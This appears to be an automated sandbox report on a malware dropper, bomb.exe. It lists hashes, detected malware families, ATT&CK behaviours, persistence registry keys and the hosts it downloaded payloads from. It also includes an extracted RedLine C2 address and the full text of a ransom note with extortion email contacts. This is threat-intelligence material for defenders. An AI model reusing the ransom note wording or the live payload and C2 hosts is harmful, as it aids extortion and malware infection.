asyncrat | 94936fb4c7bed2e7233fade7980425b0300451d76a7ac9329c604886e2a9a013

Resubmissions

22/02/2025, 17:20 UTC

250222-vwwqmavlhl 10

22/02/2025, 16:34 UTC

250222-t3a7tstphq 10

Analysis

max time kernel
150s
max time network
157s
platform
windows11-21h2_x64
resource
win11-20250217-en
resource tags

arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
submitted
22/02/2025, 16:34 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bomb.exe
Size

12KB
MD5

a14e63d27e1ac1df185fa062103aa9aa
SHA1

2b64c35e4eff4a43ab6928979b6093b95f9fd714
SHA256

dda39f19837168845de33959de34bcfb7ee7f3a29ae55c9fa7f4cb12cb27f453
SHA512

10418efcce2970dcdbef1950464c4001753fccb436f4e8ba5f08f0d4d5c9b4a22a48f2803e59421b720393d84cfabd338497c0bc77cdd4548990930b9c350082
SSDEEP

192:brl2reIazGejA7HhdSbw/z1ULU87glpK/b26J4S1Xu85:b52r+xjALhMWULU870gJJ

Malware Config

Extracted

Family

redline

Botnet

Feb2025

176.65.144.135:65012

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\Decryptfiles.txt

Ransom Note

ATTENTION! Don't worry, you can return your files! All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key. The only method of recovering files is to purchase a decrypt tool and your key. Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned. We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision. Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours. Contact us email: edfr789@tutanota.com edfr789@tutamail.com ID :C4E8252060756AE1AE9864A1E4F72EA7FB83BC941D19B8AF03FA6DA0CD493E1CD379542F4EFC0024CDCA801E89F384603F56F7D1C88B5CD24809251CAA2045E26FFD582DBD405567B9D47D1976794DEFC182AB4F2E9078DD55501A6A1969EE956AD1EB840B82C87D44D694A98993D5C198186231C17D5A2062894501927FE8D459BAE72B34DBDC74E33EBCB30538A1B1B093BDED40D5BAAF64DA9188EDED6CF1FA3E441A558D62136F22334CF7AD7CC85E328AA317B3B1C63A39827A0E7FF2E7A1F873459A5EB3E9F4320C7838558093003BF482A87E48A6BB299D4FE2C1AF63ED0871E2D9A7F7587438D5A86AA03C1DB28075DA598063C6EF4A5AEA0FC09783CA3ED320E2727E7B02A7D2259AAA0D0F77916DFB4278866263C42FB0588956BB5E86C678CB0D5DF25917A43412A6063F3007AFD8C127CF0CCD3CFB5EFD4BDC643B1A1E2F16A6B65C227DBDFAD56C6A75D37200EF9E816C0AD50D342677B32A037A56CFA671034A82E8464ECB8AB427F42470888457254EF4A5150A014535A974FEBB70BE81E716451F610176734379328D3902629BBB6DFD0D72F28E4F88579B4D8545CEFC8B86211548BE261202E7D55B67A991E1E8372491DD57A2866B8E3A21BDA815DDA68185BCFDDD7AD2F07CA14A8E6D5B40AB103EB7346F04B47B71F76147AE576CB8BDAA9D265B2EBDABBF8E48C4760EB08726925D8AD631CA47FE2FCFD77711EA8FF9EF81FE4270F83EF538F13877D89091A0AE460F5E02C71F052B563ABF661B291EA8B8DE29B41336797B2C54996090833DDD80B4195CBAACE6E1DE8216E23E1B39601C2F997D268BDC8435E0085B44BDDBCF7C55AAF648FD7A47D6314CFA85F9597B8B4AEEACC29B8116C8B95F3BE3619EA464CF74206954BFC6463074D674E2610B2653752DADA706090C496E13316A67BD3591A74BA6A166ED4A9718561A7557B6513569249EEB680416C21FB49EBB73170D2D07CFEB0616CD55D650FEDF141CC6E0A5F331166C9400599C836192B2AA0E367E3A92CCE83E302EA00E230B5636F2AC5F6F91BDA1E8B17104280CF72185D6151AB391F90879AD5921848F01269797481E99B981A3EB289CFD310F2038611B3A91999369A78D0C49B446FA96D281777C8345DE87C3FA3768A64619F6EDDB91BE8077DE6D4931ED9362104925E886451AED1982FF602B9F447273636F44C3104A29C0CC95AC9E2D4FAF1B4CA8707DCA5C82CC6CD89CD0B144943C29DD2575937CCBE6888D73F8ACB689CB0713E9D5C62D42A4E0FE944AC410873325B6A6A56AE32A48A6225C39A08B99DBF21ACA518825E1BF099CDD3EF12955AD5C1C45FEFAE4DADA61A9113F9B117893FF7DB3A760F221B762FD8894FE2072DEF4696625C13DB65DB1D0D1B38B16B5650B0C8F4744B25FC4B1919D41887BA906DF99E168D30318B94AD28BE9622792A333F33932C1A4DD70A87C4EEC4AEACFFDBA46981E1A80253616DA361FC75AA72DC0B9931D04822AAC12A49428EB03CFA97012B8F1DF2F3DCF44ECD00C9F94205FEB5AAC9EEAE5F8996BD57D09B0CB65AA21F733F94E6430A98463DE79E122C948659120EDF6B153692EF1A62AE1096FFF4807711B1BB8EB5BFBAFA8AF48FC7A657623646F6794069E8799E7FAE305855F508592D0A8615CDBEF72DC0E21FFECE27B797CB4FE987BFC1006F1D708C9C3AED318D13F910CF0093F2A79B5C468779771CFD84468DCC26648B15C6CA7DAF8A47872186F51C3D18CD52D91375A18F2D222A51E58AD05336CD530ED3F75F1C9D2D241DFBFDACD896DDC5462157AA1204EF9093F55DC1360F58E26F6C97DC33EF57086F3A6EDAAC3DC20394576EF5FEC3CBB2FC089BAFFBC93A63E85E64AA78BB8B0E08197BAF4A5D2885F69B7C96A568CB201834FEF9A72F8B88D2D695891711427CDDC3C7CF518BC2509818711DB3FDD58A30B61E4765A0EA36B57C98A3FB9DEF9780F942B871A1400CA66D93FF4BB3C1C30612AE366FB62E8E079244B15A8AA055C2A507D95F41D8AAB278393D43D7F3D3D8FEE5F9C08E85F4E98FB203144890011F8480AAB029773BEE3902E98259456858B68769C9A4CC9EB89762A26C22D217FE798EBC10802C6C4F5D7C5B9D1614615365F91F91C91DAE3008D447F07E74A5910489364C8094CAEA615B52D39B6C3D1BDC2F2144FE84A3B354B10FB7E568B6D36857B2CD0588D31B3F5DBAC3D707689DE67A0CDA87ECFACC208693730381BB5ECD4CC73DAF74D23C9A231DC084195AE7A445F9A2D16C5F474886F2AE1FF5E2E6B6969CEAB0712197EA86CD4B99FD1916E55A40E4D9E746D487852FA806DE26D0FFA57F6FF67E585058CDA2DFEC2E01292042622B33C

Emails

edfr789@tutanota.com

edfr789@tutamail.com

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Lokibot family
lokibot
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Mimikatz family
mimikatz
Phorphiex family
phorphiex

Phorphiex payload 1 IoCs

resource	yara_rule
behavioral4/files/0x001d00000002ae1b-34.dat	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral4/files/0x001900000002aea5-367.dat	family_redline
behavioral4/memory/6052-375-0x0000000000DD0000-0x0000000000DEE000-memory.dmp	family_redline

Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 2 IoCs

resource	yara_rule
behavioral4/files/0x001900000002aea5-367.dat	family_sectoprat
behavioral4/memory/6052-375-0x0000000000DD0000-0x0000000000DEE000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 2 IoCs

resource	yara_rule
behavioral4/memory/5744-352-0x0000020E86210000-0x0000020E86514000-memory.dmp	family_stormkitty
behavioral4/files/0x001c00000002ae9d-351.dat	family_stormkitty

Stormkitty family
stormkitty

XMRig Miner payload 10 IoCs

miner

resource	yara_rule
behavioral4/memory/5196-325-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral4/memory/5196-326-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral4/memory/5196-328-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral4/memory/5196-331-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral4/memory/5196-330-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral4/memory/5196-334-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral4/memory/5196-332-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral4/memory/5196-363-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral4/files/0x001900000002ae83-2052.dat	family_xmrig
behavioral4/files/0x001900000002ae83-2052.dat	xmrig

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral4/files/0x001c00000002ae9d-351.dat	family_asyncrat

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

mimikatz is an open source tool to dump credentials on Windows 1 IoCs

resource	yara_rule
behavioral4/files/0x001900000002ae81-283.dat	mimikatz

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5048	powershell.exe
3304	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 18 IoCs

flow	pid	Process
11	3024	bomb.exe
24	3024	bomb.exe
26	3024	bomb.exe
13	3024	bomb.exe
13	3024	bomb.exe
22	3024	bomb.exe
6	3024	bomb.exe
33	3024	bomb.exe
38	3024	bomb.exe
8	3024	bomb.exe
30	3024	bomb.exe
32	3024	bomb.exe
41	5148	http162.230.48.189uploadsDL.exe.exe
5	3024	bomb.exe
5	3024	bomb.exe
7	3024	bomb.exe
14	2936	http185.215.113.66pei.exe.exe
23	3024	bomb.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4428	netsh.exe
3884	netsh.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Drops startup file 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5f1c1f4a8f4a8082788e31e499b05f88.exe	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5f1c1f4a8f4a8082788e31e499b05f88.exe	svchost.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.exe	WindowsServices.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.exe	WindowsServices.exe

Executes dropped EXE 37 IoCs

pid	Process
560	httpsraw.githubusercontent.comgamingdued123UeukFImainclientside.exe.exe
2936	http185.215.113.66pei.exe.exe
5096	httpsgithub.comBARHOM1brobrrawmainWindowsServices.exe.exe
2760	httptwizt.netnewtpp.exe.exe
3744	http185.215.113.75filesLisan7random.exe.exe
2200	1188120023.exe
4076	sysnldcvmr.exe
3928	sysnldcvmr.exe
2756	WindowsServices.exe
4448	svchost.exe
356	http185.215.113.75filesz1nk0vrandom.exe.exe
2452	http185.215.113.66xmrminer.exe.exe
3864	http185.215.113.66del2.exe.exe
2976	http185.215.113.66minedelll.exe.exe
1672	http185.215.113.66del1.exe.exe
2984	wincsupdt.exe
3620	http185.215.113.66xmin.exe.exe
4188	http185.215.113.66mindelnew.exe.exe
3392	http185.215.113.66del3.exe.exe
3080	httpsgithub.comLean789ruehtrawrefsheadsmainBootxr.exe.exe
752	httpsgithub.comLean789ruehtrawrefsheadsmainDpose.exe.exe
4492	httpsgithub.comLean789ruehtrawrefsheadsmainmimikatz.exe.exe
4252	http185.215.113.66klmnr.exe.exe
4936	httpsgithub.comLean789ruehtrawrefsheadsmaintoyour.exe.exe
1528	httpsgithub.comLean789ruehtrawrefsheadsmainMizedo.exe.exe
3152	winuspdt.exe
5400	wincsupdt.exe
5744	http196.251.92.64reshClient.exe.exe
6052	http196.251.92.64reshbuild.exe.exe
5608	http196.251.92.64reshDevil2.exe.exe
1760	http162.230.48.189uploadsA.exe.exe
2036	http196.251.92.64cryptBREMCOS.exe.exe
5148	http162.230.48.189uploadsDL.exe.exe
6100	http77.105.161.58files1.exe.exe
6060	http85.209.128.206DownloadsVirtualPR.exe.exe
6352	http162.230.48.189uploadsB.exe.exe
1276	httpsgithub.comLean789ruehtrawrefsheadsmainxmrig.exe.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2250935964-4080446702-2776729278-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	http196.251.92.64reshDevil2.exe.exe
Key opened	\REGISTRY\USER\S-1-5-21-2250935964-4080446702-2776729278-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	http196.251.92.64reshDevil2.exe.exe
Key opened	\REGISTRY\USER\S-1-5-21-2250935964-4080446702-2776729278-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	http196.251.92.64reshDevil2.exe.exe

Adds Run key to start application 2 TTPs 11 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\53$79$73$74$65$6d$33$32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\explorer\\WmiPrvSE.exe"	httpsgithub.comBARHOM1brobrrawmainWindowsServices.exe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2250935964-4080446702-2776729278-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\sysnldcvmr.exe"	1188120023.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\53$79$73$74$65$6d$33$32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\explorer\\WmiPrvSE.exe"	WindowsServices.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\5f1c1f4a8f4a8082788e31e499b05f88 = "\"C:\\Windows\\svchost.exe\" .."	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System32 = "\"C:\\Windows\\WindowsServices.exe\" .."	WindowsServices.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2250935964-4080446702-2776729278-1000\Software\Microsoft\Windows\CurrentVersion\Run\G5UTDSRESW = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\httpsgithub.comLean789ruehtrawrefsheadsmainmimikatz.exe.exe\""	httpsgithub.comLean789ruehtrawrefsheadsmainmimikatz.exe.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe"	httptwizt.netnewtpp.exe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2250935964-4080446702-2776729278-1000\Software\Microsoft\Windows\CurrentVersion\Run\5f1c1f4a8f4a8082788e31e499b05f88 = "\"C:\\Windows\\svchost.exe\" .."	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2250935964-4080446702-2776729278-1000\Software\Microsoft\Windows\CurrentVersion\Run\GUTDSRESW = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\httpsgithub.comLean789ruehtrawrefsheadsmainBootxr.exe.exe\""	httpsgithub.comLean789ruehtrawrefsheadsmainBootxr.exe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2250935964-4080446702-2776729278-1000\Software\Microsoft\Windows\CurrentVersion\Run\System32 = "\"C:\\Windows\\WindowsServices.exe\" .."	WindowsServices.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2250935964-4080446702-2776729278-1000\Software\Microsoft\Windows\CurrentVersion\Run\XPSUDTARW = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\httpsgithub.comLean789ruehtrawrefsheadsmainDpose.exe.exe\""	httpsgithub.comLean789ruehtrawrefsheadsmainDpose.exe.exe

Indicator Removal: Clear Persistence 1 TTPs 2 IoCs

Clear artifacts associated with previously established persistence like scheduletasks on a host.

defense_evasion

Clear Persistence

T1070.009

pid	Process
3376	cmd.exe
5472	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
7	raw.githubusercontent.com
8	raw.githubusercontent.com
12	bitbucket.org
31	bitbucket.org
1	raw.githubusercontent.com

Drops autorun.inf file 1 TTPs 6 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File opened for modification	C:\autorun.inf	httpsgithub.comLean789ruehtrawrefsheadsmainDpose.exe.exe
File created	C:\autorun.inf	svchost.exe
File opened for modification	C:\autorun.inf	svchost.exe
File created	D:\autorun.inf	svchost.exe
File created	F:\autorun.inf	svchost.exe
File opened for modification	F:\autorun.inf	svchost.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\wbem\Performance\WmiApRpl_new.h	WMIADAP.EXE
File created	C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini	WMIADAP.EXE

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2984 set thread context of 3144	2984	wincsupdt.exe	123
PID 3152 set thread context of 5140	3152	winuspdt.exe	613
PID 3152 set thread context of 5196	3152	winuspdt.exe	168

UPX packed file 13 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral4/memory/5196-323-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral4/memory/5196-322-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral4/memory/5196-325-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral4/memory/5196-319-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral4/memory/5196-326-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral4/memory/5196-324-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral4/memory/5196-328-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral4/memory/5196-331-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral4/memory/5196-330-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral4/memory/5196-334-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral4/memory/5196-332-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral4/memory/5196-320-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral4/memory/5196-363-0x0000000140000000-0x0000000140835000-memory.dmp	upx

Drops file in Windows directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\sysnldcvmr.exe	httptwizt.netnewtpp.exe.exe
File created	C:\Windows\svchost.exe	httpsraw.githubusercontent.comgamingdued123UeukFImainclientside.exe.exe
File opened for modification	C:\Windows\svchost.exe	httpsraw.githubusercontent.comgamingdued123UeukFImainclientside.exe.exe
File created	C:\Windows\WindowsServices.exe	httpsgithub.comBARHOM1brobrrawmainWindowsServices.exe.exe
File opened for modification	C:\Windows\WindowsServices.exe	WindowsServices.exe
File created	C:\Windows\sysnldcvmr.exe	httptwizt.netnewtpp.exe.exe
File created	C:\Windows\sysnldcvmr.exe	1188120023.exe
File opened for modification	C:\Windows\svchost.exe	svchost.exe

Launches sc.exe 11 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3152	sc.exe
3304	sc.exe
4480	sc.exe
4924	sc.exe
2260	sc.exe
1664	sc.exe
3512	sc.exe
1060	sc.exe
5092	sc.exe
2316	sc.exe
4912	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 2 IoCs

pid	pid_target	Process	procid_target
3096	3744	WerFault.exe	86
6124	4004	WerFault.exe	113

System Location Discovery: System Language Discovery 1 TTPs 50 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	http162.230.48.189uploadsB.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	http185.215.113.75filesLisan7random.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	http185.215.113.66mindelnew.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httptwizt.netnewtpp.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysnldcvmr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpsgithub.comLean789ruehtrawrefsheadsmainDpose.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	http185.215.113.66klmnr.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	http196.251.92.64reshbuild.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	http196.251.92.64reshDevil2.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	http185.215.113.66pei.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1188120023.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	http185.215.113.75filesz1nk0vrandom.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	http196.251.92.64cryptBREMCOS.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysnldcvmr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WindowsServices.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpsgithub.comLean789ruehtrawrefsheadsmainmimikatz.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	http85.209.128.206DownloadsVirtualPR.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpsgithub.comBARHOM1brobrrawmainWindowsServices.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpsgithub.comLean789ruehtrawrefsheadsmainBootxr.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpsgithub.comLean789ruehtrawrefsheadsmaintoyour.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpsgithub.comLean789ruehtrawrefsheadsmainMizedo.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	httpsraw.githubusercontent.comgamingdued123UeukFImainclientside.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	http162.230.48.189uploadsA.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	http162.230.48.189uploadsDL.exe.exe

Checks SCSI registry key(s) 3 TTPs 8 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	dwm.exe

Kills process with taskkill 10 IoCs

defense_evasion

pid	Process
2228	taskkill.exe
5532	taskkill.exe
1304	taskkill.exe
5296	taskkill.exe
5388	taskkill.exe
5408	taskkill.exe
5448	taskkill.exe
5724	taskkill.exe
5620	taskkill.exe
1112	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	dwm.exe
